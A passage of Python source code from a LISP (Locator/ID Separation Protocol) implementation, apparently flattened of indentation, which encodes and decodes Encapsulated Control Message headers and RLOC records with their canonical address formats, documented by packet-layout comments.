# / | Source Port = xxxx | Dest Port = yyyy |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LCM | LISP Control Message |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_UDP_PROTOCOL = 17
LISP_DEFAULT_ECM_TTL = 128
class lisp_ecm():
def __init__(self, sport):
self.security = False
self.ddt = False
self.to_etr = False
self.to_ms = False
self.length = 0
self.ttl = LISP_DEFAULT_ECM_TTL
self.protocol = LISP_UDP_PROTOCOL
self.ip_checksum = 0
self.source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.udp_sport = sport
self.udp_dport = LISP_CTRL_PORT
self.udp_checksum = 0
self.udp_length = 0
self.afi = LISP_AFI_NONE
#enddef
def print_ecm(self):
line = ("{} -> flags: {}{}{}{}, " + \
"inner IP: {} -> {}, inner UDP: {} -> {}")
lprint(line.format(bold("ECM", False), "S" if self.security else "s",
"D" if self.ddt else "d", "E" if self.to_etr else "e",
"M" if self.to_ms else "m",
green(self.source.print_address(), False),
green(self.dest.print_address(), False), self.udp_sport,
self.udp_dport))
def encode(self, packet, inner_source, inner_dest):
self.udp_length = len(packet) + 8
self.source = inner_source
self.dest = inner_dest
if (inner_dest.is_ipv4()):
self.afi = LISP_AFI_IPV4
self.length = self.udp_length + 20
#endif
if (inner_dest.is_ipv6()):
self.afi = LISP_AFI_IPV6
self.length = self.udp_length
#endif
#
# Encode ECM header first, then the IPv4 or IPv6 header, then the
# UDP header.
#
first_long = (LISP_ECM << 28)
if (self.security): first_long |= 0x08000000
if (self.ddt): first_long |= 0x04000000
if (self.to_etr): first_long |= 0x02000000
if (self.to_ms): first_long |= 0x01000000
ecm = struct.pack("I", socket.htonl(first_long))
ip = ""
if (self.afi == LISP_AFI_IPV4):
ip = struct.pack("BBHHHBBH", 0x45, 0, socket.htons(self.length),
0, 0, self.ttl, self.protocol, socket.htons(self.ip_checksum))
ip += self.source.pack_address()
ip += self.dest.pack_address()
ip = lisp_ip_checksum(ip)
#endif
if (self.afi == LISP_AFI_IPV6):
ip = struct.pack("BBHHBB", 0x60, 0, 0, socket.htons(self.length),
self.protocol, self.ttl)
ip += self.source.pack_address()
ip += self.dest.pack_address()
#endif
s = socket.htons(self.udp_sport)
d = socket.htons(self.udp_dport)
l = socket.htons(self.udp_length)
c = socket.htons(self.udp_checksum)
udp = struct.pack("HHHH", s, d, l, c)
return(ecm + ip + udp)
#enddef
def decode(self, packet):
#
# Decode ECM header.
#
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.security = True if (first_long & 0x08000000) else False
self.ddt = True if (first_long & 0x04000000) else False
self.to_etr = True if (first_long & 0x02000000) else False
self.to_ms = True if (first_long & 0x01000000) else False
packet = packet[format_size::]
#
# Decode inner IPv4/IPv6 and UDP header.
#
if (len(packet) < 1): return(None)
version = struct.unpack("B", packet[0:1])[0]
version = version >> 4
if (version == 4):
format_size = struct.calcsize("HHIBBH")
if (len(packet) < format_size): return(None)
x, l, x, t, p, c = struct.unpack("HHIBBH", packet[:format_size])
self.length = socket.ntohs(l)
self.ttl = t
self.protocol = p
self.ip_checksum = socket.ntohs(c)
self.source.afi = self.dest.afi = LISP_AFI_IPV4
#
# Zero out IPv4 header checksum.
#
p = struct.pack("H", 0)
offset1 = struct.calcsize("HHIBB")
offset2 = struct.calcsize("H")
packet = packet[:offset1] + p + packet[offset1+offset2:]
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
if (version == 6):
format_size = struct.calcsize("IHBB")
if (len(packet) < format_size): return(None)
x, l, p, t = struct.unpack("IHBB", packet[:format_size])
self.length = socket.ntohs(l)
self.protocol = p
self.ttl = t
self.source.afi = self.dest.afi = LISP_AFI_IPV6
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source.mask_len = self.source.host_mask_len()
self.dest.mask_len = self.dest.host_mask_len()
format_size = struct.calcsize("HHHH")
if (len(packet) < format_size): return(None)
s, d, l, c = struct.unpack("HHHH", packet[:format_size])
self.udp_sport = socket.ntohs(s)
self.udp_dport = socket.ntohs(d)
self.udp_length = socket.ntohs(l)
self.udp_checksum = socket.ntohs(c)
packet = packet[format_size::]
return(packet)
#enddef
#endclass
#
# This is the structure of an RLOC record in a Map-Request, Map-Reply, and
# Map-Register's EID record.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# /| Priority | Weight | M Priority | M Weight |
# L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# o | Unused Flags |L|p|R| Loc-AFI |
# c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \| Locator |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# AFI-List LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 1 | Rsvd2 | 2 + 4 + 2 + 16 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 1 | IPv4 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv4 Address | AFI = 2 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Geo Coordinate LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 5 | Rsvd2 | Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |U|N|E|A|M|R|K| Reserved | Location Uncertainty |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Lat Degrees | Latitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Long Degrees | Longitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Altitude |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Radius | Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Explicit Locator Path (ELP) Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 10 | Rsvd2 | n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop k ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Replication List Entry Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 13 | Rsvd2 | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #1 RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #n RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Security Key Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 11 | Rsvd2 | 6 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Count | Rsvd3 |A| Cipher Suite| Rsvd4 |R|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Length | Public Key Material ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... Public Key Material |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Locator Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# JSON Data Model Type Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 14 | kid | Rvd2|E|B| Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | JSON length | JSON binary/text encoding ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Optional Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When the E-bit is set to 1, then the kid is key-id and indicates that
# value fields in JSON string are encrypted with the encryption key
# associated with key-id 'kid'.
#
class lisp_rloc_record():
def __init__(self):
self.priority = 0
self.weight = 0
self.mpriority = 0
self.mweight = 0
self.local_bit = False
self.probe_bit = False
self.reach_bit = False
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.rloc_name = None
self.keys = None
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def print_record(self, indent):
rloc_str = self.print_rloc_name()
if (rloc_str != ""): rloc_str = ", " + rloc_str
geo_str = ""
if (self.geo):
name = ""
if (self.geo.geo_name): name = "'{}' ".format(self.geo.geo_name)
geo_str = ", geo: {}{}".format(name, self.geo.print_geo())
#endif
elp_str = ""
if (self.elp):
name = ""
if (self.elp.elp_name): name = "'{}' ".format(self.elp.elp_name)
elp_str = ", elp: {}{}".format(name, self.elp.print_elp(True))
#endif
rle_str = ""
if (self.rle):
name = ""
if (self.rle.rle_name): name = "'{}' ".format(self.rle.rle_name)
rle_str = ", rle: {}{}".format(name, self.rle.print_rle(False,
True))
#endif
json_str = ""
if (self.json):
name = ""
if (self.json.json_name):
name = "'{}' ".format(self.json.json_name)
#endif
json_str = ", json: {}".format(self.json.print_json(False))
#endif
sec_str = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
sec_str = ", " + self.keys[1].print_keys()
#endif
line = ("{}RLOC-record -> flags: {}, {}/{}/{}/{}, afi: {}, rloc: "
+ "{}{}{}{}{}{}{}")
lprint(line.format(indent, self.print_flags(), self.priority,
self.weight, self.mpriority, self.mweight, self.rloc.afi,
red(self.rloc.print_address_no_iid(), False), rloc_str, geo_str,
elp_str, rle_str, json_str, sec_str))
#enddef
def print_flags(self):
return("{}{}{}".format("L" if self.local_bit else "l", "P" \
if self.probe_bit else "p", "R" if self.reach_bit else "r"))
#enddef
def store_rloc_entry(self, rloc_entry):
rloc = rloc_entry.rloc if (rloc_entry.translated_rloc.is_null()) \
else rloc_entry.translated_rloc
self.rloc.copy_address(rloc)
if (rloc_entry.rloc_name):
self.rloc_name = rloc_entry.rloc_name
#endif
if (rloc_entry.geo):
self.geo = rloc_entry.geo
else:
name = rloc_entry.geo_name
if (name and lisp_geo_list.has_key(name)):
self.geo = lisp_geo_list[name]
#endif
#endif
if (rloc_entry.elp):
self.elp = rloc_entry.elp
else:
name = rloc_entry.elp_name
if (name and lisp_elp_list.has_key(name)):
self.elp = lisp_elp_list[name]
#endif
#endif
if (rloc_entry.rle):
self.rle = rloc_entry.rle
else:
name = rloc_entry.rle_name
if (name and lisp_rle_list.has_key(name)):
self.rle = lisp_rle_list[name]
#endif
#endif
if (rloc_entry.json):
self.json = rloc_entry.json
else:
name = rloc_entry.json_name
if (name and lisp_json_list.has_key(name)):
self.json = lisp_json_list[name]
#endif
#endif
self.priority = rloc_entry.priority
self.weight = rloc_entry.weight
self.mpriority = rloc_entry.mpriority
self.mweight = rloc_entry.mweight
#enddef
def encode_json(self, lisp_json):
json_string = lisp_json.json_string
kid = 0
if (lisp_json.json_encrypted):
kid = (lisp_json.json_key_id << 5) | 0x02
#endif
lcaf_type = LISP_LCAF_JSON_TYPE
lcaf_afi = socket.htons(LISP_AFI_LCAF)
addr_len = self.rloc.addr_length() + 2
lcaf_len = socket.htons(len(json_string) + addr_len)
json_len = socket.htons(len(json_string))
packet = struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, kid,
lcaf_len, json_len)
packet += json_string
#
# If telemetry, store RLOC address in LCAF.
#
if (lisp_is_json_telemetry(json_string)):
packet += struct.pack("H", socket.htons(self.rloc.afi))
packet += self.rloc.pack_address()
else:
packet += struct.pack("H", 0)
#endif
return(packet)
#enddef
def encode_lcaf(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
gpkt = ""
if (self.geo):
gpkt = self.geo.encode_geo()
#endif
epkt = ""
if (self.elp):
elp_recs = ""
for elp_node in self.elp.elp_nodes:
afi = socket.htons(elp_node.address.afi)
flags = 0
if (elp_node.eid): flags |= 0x4
if (elp_node.probe): flags |= 0x2
if (elp_node.strict): flags |= 0x1
flags = socket.htons(flags)
elp_recs += struct.pack("HH", flags, afi)
elp_recs += elp_node.address.pack_address()
#endfor
elp_len = socket.htons(len(elp_recs))
epkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_ELP_TYPE,
0, elp_len)
epkt += elp_recs
#endif
rpkt = ""
if (self.rle):
rle_recs = ""
for rle_node in self.rle.rle_nodes:
afi = socket.htons(rle_node.address.afi)
rle_recs += struct.pack("HBBH", 0, 0, rle_node.level, afi)
rle_recs += rle_node.address.pack_address()
if (rle_node.rloc_name):
rle_recs += struct.pack("H", socket.htons(LISP_AFI_NAME))
rle_recs += rle_node.rloc_name + "\0"
#endif
#endfor
rle_len = socket.htons(len(rle_recs))
rpkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_RLE_TYPE,
0, rle_len)
rpkt += rle_recs
#endif
jpkt = ""
if (self.json):
jpkt = self.encode_json(self.json)
#endif
spkt = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
spkt = self.keys[1].encode_lcaf(self.rloc)
#endif
npkt = ""
if (self.rloc_name):
npkt += struct.pack("H", socket.htons(LISP_AFI_NAME))
npkt += self.rloc_name + "\0"
#endif
apkt_len = len(gpkt) + len(epkt) + len(rpkt) + len(spkt) + 2 + \
len(jpkt) + self.rloc.addr_length() + len(npkt)
apkt_len = socket.htons(apkt_len)
apkt = struct.pack("HBBBBHH", lcaf_afi, 0, 0, LISP_LCAF_AFI_LIST_TYPE,
0, apkt_len, socket.htons(self.rloc.afi))
apkt += self.rloc.pack_address()
return(apkt + npkt + gpkt + epkt + rpkt + spkt + jpkt)
#enddef
def encode(self):
flags = 0
if (self.local_bit): flags |= 0x0004
if (self.probe_bit): flags |= 0x0002
if (self.reach_bit): flags |= 0x0001
packet = struct.pack("BBBBHH", self.priority, self.weight,
self.mpriority, self.mweight, socket.htons(flags),
socket.htons(self.rloc.afi))
if (self.geo or self.elp or self.rle or self.keys or self.rloc_name \
or self.json):
packet = packet[0:-2] + self.encode_lcaf()
else:
packet += self.rloc.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, nonce, ms_json_encrypt):
packet_format = "HBBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
#
# Process AFI-List LCAF.
#
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE):
while (lcaf_len > 0):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
packet_len = len(packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF):
packet = self.decode_lcaf(packet, nonce, ms_json_encrypt)
if (packet == None): return(None)
else:
packet = packet[format_size::]
self.rloc_name = None
if (afi == LISP_AFI_NAME):
packet, rloc_name = lisp_decode_dist_name(packet)
self.rloc_name = rloc_name
else:
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
#endif
lcaf_len -= packet_len - len(packet)
#endwhile
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
#
# Process Geo-Coordinate LCAF.
#
geo = lisp_geo("")
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
if (packet == None): return(None)
self.geo = geo
elif (lcaf_type == LISP_LCAF_JSON_TYPE):
encrypted_json = rsvd2 & 0x02
#
# Process JSON LCAF.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
json_len = struct.unpack(packet_format, packet[:format_size])[0]
json_len = socket.ntohs(json_len)
if (lcaf_len < format_size + json_len): return(None)
packet = packet[format_size::]
self.json = lisp_json("", packet[0:json_len], encrypted_json,
ms_json_encrypt)
packet = packet[json_len::]
#
# If telemetry, store RLOC address in LCAF.
#
afi = socket.ntohs(struct.unpack("H", packet[:2])[0])
packet = packet[2::]
if (afi != 0 and lisp_is_json_telemetry(self.json.json_string)):
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
#endif
elif (lcaf_type == LISP_LCAF_ELP_TYPE):
#
# Process ELP LCAF.
#
elp = lisp_elp(None)
elp.elp_nodes = []
while (lcaf_len > 0):
flags, afi = struct.unpack("HH", packet[:4])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
elp_node = lisp_elp_node()
elp.elp_nodes.append(elp_node)
flags = socket.ntohs(flags)
elp_node.eid = (flags & 0x4)
elp_node.probe = (flags & 0x2)
elp_node.strict = (flags & 0x1)
elp_node.address.afi = afi
elp_node.address.mask_len = elp_node.address.host_mask_len()
packet = elp_node.address.unpack_address(packet[4::])
lcaf_len -= elp_node.address.addr_length() + 4
#endwhile
elp.select_elp_node()
self.elp = elp
elif (lcaf_type == LISP_LCAF_RLE_TYPE):
#
# Process RLE LCAF.
#
rle = lisp_rle(None)
rle.rle_nodes = []
while (lcaf_len > 0):
x, y, level, afi = struct.unpack("HBBH", packet[:6])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
rle_node = lisp_rle_node()
rle.rle_nodes.append(rle_node)
rle_node.level = level
rle_node.address.afi = afi
rle_node.address.mask_len = rle_node.address.host_mask_len()
packet = rle_node.address.unpack_address(packet[6::])
lcaf_len -= rle_node.address.addr_length() + 6
if (lcaf_len >= 2):
afi = struct.unpack("H", packet[:2])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[2::]
packet, rle_node.rloc_name = \
lisp_decode_dist_name(packet)
if (packet == None): return(None)
lcaf_len -= len(rle_node.rloc_name) + 1 + 2
#endif
#endif
#endwhile
self.rle = rle
self.rle.build_forwarding_list()
elif (lcaf_type == LISP_LCAF_SECURITY_TYPE):
#
# Get lisp_key() data structure so we can parse keys in the Map-
# Reply RLOC-record. Then get the RLOC address.
#
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, lcaf_len, False)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, lcaf_len, False)
if (packet == None): return(None)
if (len(packet) < 2): return(None)
afi = struct.unpack("H", packet[:2])[0]
self.rloc.afi = socket.ntohs(afi)
if (len(packet) < self.rloc.addr_length()): return(None)
packet = self.rloc.unpack_address(packet[2::])
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#
# Some RLOC records may not have RLOC addresses but other LCAF
# types. Don't process security keys because we need RLOC addresses
# to index into security data structures.
#
if (self.rloc.is_null()): return(packet)
rloc_name_str = self.rloc_name
if (rloc_name_str): rloc_name_str = blue(self.rloc_name, False)
#
# If we found no stored key, store the newly created lisp_keys()
# to the RLOC list if and only if a remote public-key was supplied
# in the Map-Reply.
#
stored_key = self.keys[1] if self.keys else None
if (stored_key == None):
if (key.remote_public_key == None):
string = bold("No remote encap-public-key supplied", False)
lprint(" {} for {}".format(string, rloc_name_str))
key = None
else:
string = bold("New encap-keying with new state", False)
lprint(" {} for {}".format(string, rloc_name_str))
key.compute_shared_key("encap")
#endif
#endif
#
# If we have stored-key, the other side received the local public
# key that is stored in variable 'stored_key'. If the remote side
# did not supply a public-key, it doesn't want to do lisp-crypto.
# If it did supply a public key, check to see if the same as
# last time, and if so, do nothing, else we do a rekeying.
#
if (stored_key):
if (key.remote_public_key == None):
key = None
remote = bold("Remote encap-unkeying occurred", False)
lprint(" {} for {}".format(remote, rloc_name_str))
elif (stored_key.compare_keys(key)):
key = stored_key
lprint(" Maintain stored encap-keys for {}".format( \
rloc_name_str))
else:
if (stored_key.remote_public_key == None):
string = "New encap-keying for existing state"
else:
string = "Remote encap-rekeying"
#endif
lprint(" {} for {}".format(bold(string, False),
rloc_name_str))
stored_key.remote_public_key = key.remote_public_key
stored_key.compute_shared_key("encap")
key = stored_key
#endif
#endif
self.keys = [None, key, None, None]
else:
#
# All other LCAFs we skip over and ignore.
#
packet = packet[lcaf_len::]
#endif
return(packet)
#enddef
def decode(self, packet, nonce, ms_json_encrypt=False):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.priority, self.weight, self.mpriority, self.mweight, flags, \
afi = struct.unpack(packet_format, packet[:format_size])
flags = socket.ntohs(flags)
afi = socket.ntohs(afi)
self.local_bit = True if (flags & 0x0004) else False
self.probe_bit = True if (flags & 0x0002) else False
self.reach_bit = True if (flags & 0x0001) else False
if (afi == LISP_AFI_LCAF):
packet = packet[format_size-2::]
packet = self.decode_lcaf(packet, nonce, ms_json_encrypt)
else:
self.rloc.afi = afi
packet = packet[format_size::]
packet = self.rloc.unpack_address(packet)
#endif
self.rloc.mask_len = self.rloc.host_mask_len()
return(packet)
#enddef
def end_of_rlocs(self, packet, rloc_count):
for i in range(rloc_count):
packet = self.decode(packet, None, False)
if (packet == None): return(None)
#endfor
return(packet)
#enddef
#endclass
#
# Map-Referral Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=6 | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Referral Count| EID mask-len | ACT |A|I| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c |SigCnt | Map Version Number | EID-AFI |
